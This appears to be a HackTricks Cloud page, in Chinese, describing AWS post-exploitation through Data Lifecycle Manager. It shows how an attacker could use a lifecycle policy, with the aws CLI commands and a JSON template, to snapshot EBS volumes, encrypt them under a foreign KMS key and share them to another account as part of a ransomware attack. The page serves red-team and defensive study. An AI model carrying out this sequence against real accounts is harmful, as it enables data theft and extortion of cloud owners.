HackTricks CloudAWS - DLM 后利用
Tip
学习并练习 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 subscription plans!
- 加入 💬 Discord group 或者 telegram group 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PRs 来分享 hacking tricks。
数据生命周期管理器 (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
可以通过对尽可能多的 EBS 卷进行加密,然后擦除当前的 EC2 实例、EBS 卷和快照,来执行一次 ransomware 攻击。为自动化这一恶意活动,可以使用 Amazon DLM,使用来自另一个 AWS account 的 KMS key 对快照进行加密并将加密的快照转移到不同的账户。或者,他们也可能将未加密的快照转移到自己管理的账户,然后在那里对其加密。虽然直接对现有的 EBS 卷或快照加密并不简单,但可以通过创建新的卷或快照来实现。
首先,会使用一个命令收集有关卷的信息,例如 instance ID、volume ID、encryption status、attachment status 和 volume type。
aws ec2 describe-volumes
其次,会创建 lifecycle policy。该命令使用 DLM API 来设置一个 lifecycle policy,在指定的时间自动对指定卷进行每日快照。它还会对快照应用特定的标签,并将卷的标签复制到快照。policyDetails.json 文件包含 lifecycle policy 的具体内容,例如目标标签、计划、用于加密的可选 KMS key 的 ARN,以及用于快照共享的目标账户,这些操作会记录在受害者的 CloudTrail 日志中。
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
策略文档的模板可在此查看:
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
Tip
学习并练习 AWS Hacking:
学习并练习 GCP Hacking:
学习并练习 Az Hacking:支持 HackTricks
- 查看 subscription plans!
- 加入 💬 Discord group 或者 telegram group 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PRs 来分享 hacking tricks。